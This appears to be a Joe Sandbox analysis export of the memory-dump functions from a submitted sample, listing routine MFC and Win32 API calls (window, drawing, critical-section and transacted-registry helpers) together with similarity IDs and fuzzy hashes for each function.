Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: BitmapColorCreate_memset
String ID: (
API String ID: 3930187609-3887548279
Opcode ID: 4a1f42fe27ee1ddc0802426256ca951888068cb4b8db215d50b7c7950c453ddd
Instruction ID: df8da0eac5f7166286729dfcd613f5e588557cedd1a2bcc25017c0e98fa13b8f
Opcode Fuzzy Hash: 4a1f42fe27ee1ddc0802426256ca951888068cb4b8db215d50b7c7950c453ddd
Instruction Fuzzy Hash: 1421F531A11258DBDB04CBB8CD55BEDBBF8AB55700F00446EE54AEB281DE315A48CF61

Function 001CDB6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001CDB75
LoadCursorW.USER32(00000000,00007F00), ref: 001CDBA1
GetClassInfoW.USER32(?,00000000,?), ref: 001CDBE5

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Strings

%s:%x:%x:%x:%x, xrefs: 001CDBCF

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$ClassCursorException@8InfoLoadThrow
String ID: %s:%x:%x:%x:%x
API String ID: 3308755097-1000192757
Opcode ID: 821b9a22c688ec4facd6adce86295cbe8d4b133aeb7d7a7767bfd0a7a613c034
Instruction ID: 89d11ccf2a8f83c2a88829639d29dd7775164ec5328ce98510b794bc53e147cf
Opcode Fuzzy Hash: 821b9a22c688ec4facd6adce86295cbe8d4b133aeb7d7a7767bfd0a7a613c034
Instruction Fuzzy Hash: E82129B0D01219AFCB00EFA5D885BDEBBB4BF28700F50842EF844A7251DB749A41CF65

Function 0022AB47 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0022AB4E

Part of subcall function 0023B240: __EH_prolog3.LIBCMT ref: 0023B247
Part of subcall function 0023B240: SetRectEmpty.USER32(?), ref: 0023B32D
Part of subcall function 0023B240: SetRectEmpty.USER32(?), ref: 0023B356

SetRectEmpty.USER32(?), ref: 0022AC55
SetRectEmpty.USER32(?), ref: 0022AC5E

Strings

(;/, xrefs: 0022ABB4

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect$H_prolog3
String ID: (;/
API String ID: 3752103406-1585191979
Opcode ID: 988acb56f66e302b833e76b4e78e92baad26b5d462b6839de4a1b784f6e5b22a
Instruction ID: 15b92b5dffab616b8a5e2fe34574ef2293775d2d736edb76467948e85599f972
Opcode Fuzzy Hash: 988acb56f66e302b833e76b4e78e92baad26b5d462b6839de4a1b784f6e5b22a
Instruction Fuzzy Hash: 783119B0952B068BC362DF6AC5C86CAFBE8BF08300F914A2ED1AE97211C7706654CF45

Function 001F2DF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 001F2E15
InflateRect.USER32(?,000000FF,000000FF), ref: 001F2E4C
DrawEdge.USER32(?,?,00000000,0000000F), ref: 001F2E6C

Strings

iii, xrefs: 001F2E32

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$DrawEdgeFillInflate
String ID: iii
API String ID: 785442924-940974255
Opcode ID: 5325b7825ee6badaf12f9513e57b47cf7361ef81c309a7b609e9f1652bebbc54
Instruction ID: 16f8fd9f3d9bf215554f4e27a19600681acaac89c39601313fbe6535f7e085c9
Opcode Fuzzy Hash: 5325b7825ee6badaf12f9513e57b47cf7361ef81c309a7b609e9f1652bebbc54
Instruction Fuzzy Hash: 10110A71500209AFCF01DFA4DD859EF77BDFB49324F104526B916EA191DB30DA05CB60

Function 001E9FA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 001E9FCC
GetParent.USER32(?), ref: 001E9FF2
GetParent.USER32(?), ref: 001EA00D

Strings

02, xrefs: 001E9FD8

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent$Window
String ID: 02
API String ID: 2655711241-3198232237
Opcode ID: fa20932132dac049678b3a2da8705fc3462b2ac44ae3cf0cb5d3c5add845387c
Instruction ID: 53f5343216be8bf05292259c0a50ea5d7eb530f0bbb3254313b5065c84b13ecd
Opcode Fuzzy Hash: fa20932132dac049678b3a2da8705fc3462b2ac44ae3cf0cb5d3c5add845387c
Instruction Fuzzy Hash: 7701D276114755AFEB243B66AC86F6FB39CFF65760B15002AF90497212EF70FC008A61

Function 00203324 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6230
Part of subcall function 001D61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6242
Part of subcall function 001D61F6: LeaveCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D624F
Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D625F

CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0020358B), ref: 0020336D
CreatePatternBrush.GDI32(00000000), ref: 0020337A
DeleteObject.GDI32(00000000), ref: 00203386

Strings

h f3, xrefs: 00203396

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$CreateEnter$BitmapBrushDeleteInitializeLeaveObjectPattern
String ID: h f3
API String ID: 3767330792-1810688807
Opcode ID: 442bc8b1c5143e5e182094af725ffa621844bbcb521d8380c1d23928c5ddc2b4
Instruction ID: 76cc567004f1d368798087f1e74778da75fcbd74c8681f5a9d9f60cebe5bf142
Opcode Fuzzy Hash: 442bc8b1c5143e5e182094af725ffa621844bbcb521d8380c1d23928c5ddc2b4
Instruction Fuzzy Hash: F7012631590704BFDB01EFB8ED877AA3AA8AB58B40F004169F506EB1D2CF6489148B61

Function 001DACB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6230
Part of subcall function 001D61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6242
Part of subcall function 001D61F6: LeaveCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D624F
Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D625F

Part of subcall function 001D1231: __EH_prolog3_catch.LIBCMT ref: 001D1238

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 001DACF9
FreeLibrary.KERNEL32(?), ref: 001DAD09

Strings

hhctrl.ocx, xrefs: 001DACDD
HtmlHelpW, xrefs: 001DACF3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpW$hhctrl.ocx
API String ID: 2853499158-3773518134
Opcode ID: c71e2d16ddf2e5baebb555b1443553c18fa8de5eb7eb5508ea899dd0011391ab
Instruction ID: 7145d2cf4496c26281c9b199cbf76a6a0b71017902946bd4d87e6d298793af46
Opcode Fuzzy Hash: c71e2d16ddf2e5baebb555b1443553c18fa8de5eb7eb5508ea899dd0011391ab
Instruction Fuzzy Hash: E4014432180B06BFCB21AFA1CC0AF4A3B96EF20762F40841BF91A95651EF70D850D692

Function 001D0F09 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 001D0F2A
GetClassNameW.USER32(?,?,0000000A), ref: 001D0F3F
CompareStringW.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 001D0F59

Strings

combobox, xrefs: 001D0F47

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClassCompareLongNameStringWindow
String ID: combobox
API String ID: 1414938635-2240613097
Opcode ID: ccfa05e7fd0680b150d6b547dab905395475bd5fc75e7e4b1a467d42d2eae333
Instruction ID: cb735ad81e5f111932e0c4f2e2983e7681e7318754f915682855abd6cf262af2
Opcode Fuzzy Hash: ccfa05e7fd0680b150d6b547dab905395475bd5fc75e7e4b1a467d42d2eae333
Instruction Fuzzy Hash: A5F0C832654218BFCB11EF78DC86EBE77A8DB0A720F600715F562EB1C0DB20A9018795

Function 0021F478 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40timewindowCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,00000002), ref: 0021F49F
GetFocus.USER32 ref: 0021F4AB
RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 0021F4DC

Strings

y, xrefs: 0021F489

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: FocusKillRedrawTimerWindow
String ID: y
API String ID: 1950525498-4225443349
Opcode ID: 906243ff3ce5ce6ddce8f78cd2cf1c347b8bf8e375d7cdb59efbc714323bbe9e
Instruction ID: 4d711d00ba0bd1ef51c1b541cd542e68a0661c7323a3b00cecfadcb3f7c11301
Opcode Fuzzy Hash: 906243ff3ce5ce6ddce8f78cd2cf1c347b8bf8e375d7cdb59efbc714323bbe9e
Instruction Fuzzy Hash: 9EF0A931670205EFDB705F51DE09BAB77E5B774711F208439E66A49051D6B58890DF80

Function 001D183D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 001D184F
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 001D185F

Strings

RegCreateKeyTransactedW, xrefs: 001D1859
Advapi32.dll, xrefs: 001D184A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW
API String ID: 1646373207-2994018265
Opcode ID: 50d3132a9a74e4861b2d53b42adbc2d1e6c6502dca10c08de7ebec8541dcc9e8
Instruction ID: d78f80ca28aa536f88a980cc72e3b4f0553e3482f3e66cf547fc196f712ebe2d
Opcode Fuzzy Hash: 50d3132a9a74e4861b2d53b42adbc2d1e6c6502dca10c08de7ebec8541dcc9e8
Instruction Fuzzy Hash: 57F03732180249FBCF125F91EC08BEA3BAAFB08751F054466FA5995060C776C870EBA0

Function 001D18A2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 001D18B6
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 001D18C6

Strings

RegDeleteKeyTransactedW, xrefs: 001D18C0
Advapi32.dll, xrefs: 001D18B1

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyTransactedW
API String ID: 1646373207-2168864297
Opcode ID: 0d1a46b5c417a7aeca01811e805ea8b10324acc87f6585d1b42e50de0d3f7064
Instruction ID: 5643ff7d1c495099cd2dad9e7cf75cc38dd41bd9025a149a41189c072888a58e
Opcode Fuzzy Hash: 0d1a46b5c417a7aeca01811e805ea8b10324acc87f6585d1b42e50de0d3f7064
Instruction Fuzzy Hash: E8F0A732240280BB87315B9BEC0CC67BB6AEBC1B61355453BF199C5110D7324855F760

Function 001D17E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 001D17F6
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 001D1806

Strings

RegOpenKeyTransactedW, xrefs: 001D1800
Advapi32.dll, xrefs: 001D17F1

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 1646373207-3913318428
Opcode ID: e82119bb0cdb3b6c95881746aa4df6944437d9467a32ec213a538ca50743d5eb
Instruction ID: af1d5b03671dce0e2a6ff0e783b275e6302138ed1db03e528c3661ff4fa43b05
Opcode Fuzzy Hash: e82119bb0cdb3b6c95881746aa4df6944437d9467a32ec213a538ca50743d5eb
Instruction Fuzzy Hash: 61F08232280246FBCF219F91EC08BE63BA9EF19751F084436F595D51B0DB71D8A0EBA1

Function 002049B6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002049C8
GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 002049D8

Strings

kernel32.dll, xrefs: 002049C3
GetFileAttributesTransactedW, xrefs: 002049D2

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetFileAttributesTransactedW$kernel32.dll
API String ID: 1646373207-1378992308
Opcode ID: 112e8a29e18ae38e886e294bd046aef8cc6752b9af165cf6cf0066a90441d1de
Instruction ID: 43c3db07eba9e0efe8ba093bd5185f661253178a42f495e24357cbcdcdd5cdd4
Opcode Fuzzy Hash: 112e8a29e18ae38e886e294bd046aef8cc6752b9af165cf6cf0066a90441d1de
Instruction Fuzzy Hash: 2CF0A0722A034AEBCF212FA5AC08B967798EB04751F04863BF648950A0DE71C8B0DA90

Function 002186AD Relevance: 6.5, APIs: 4, Instructions: 476COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 002186B4
GetWindowRect.USER32(?,?), ref: 002188AC
GetParent.USER32(?), ref: 00218930
GetParent.USER32(?), ref: 00218C24

Part of subcall function 0021DF57: GetParent.USER32(?), ref: 0021DF88

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent$H_prolog3_RectWindow
String ID:
API String ID: 3969657074-0
Opcode ID: 6b18402a8d0c43640823bf98e0f181440257aca9b8d5a832b9a0e606060f7202
Instruction ID: 621382c1a2fea6930ebed8f6b825eab8b29c03675e5aca0323a65e84cb97ba44
Opcode Fuzzy Hash: 6b18402a8d0c43640823bf98e0f181440257aca9b8d5a832b9a0e606060f7202
Instruction Fuzzy Hash: D7124770A11209AFCF15EFA4C899AEDB7F6BF68310F14012AF456E7291DF309A41CB51

Function 00203DBB Relevance: 6.3, APIs: 4, Instructions: 253COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00203DC2

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

_memset.LIBCMT ref: 00203E56
_memset.LIBCMT ref: 00203EEF
_memset.LIBCMT ref: 0020401D

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _memset$H_prolog3$Exception@8Throw
String ID:
API String ID: 3059216242-0
Opcode ID: 9b83bd3984c95bacd0f5174bed7e6376c6321be83862b0799b42cf26d0642d90
Instruction ID: b1417abc875f4bc9a90a0ef1d62bbf2bc9e611044fbba35c4aa4075402dd2fdc
Opcode Fuzzy Hash: 9b83bd3984c95bacd0f5174bed7e6376c6321be83862b0799b42cf26d0642d90
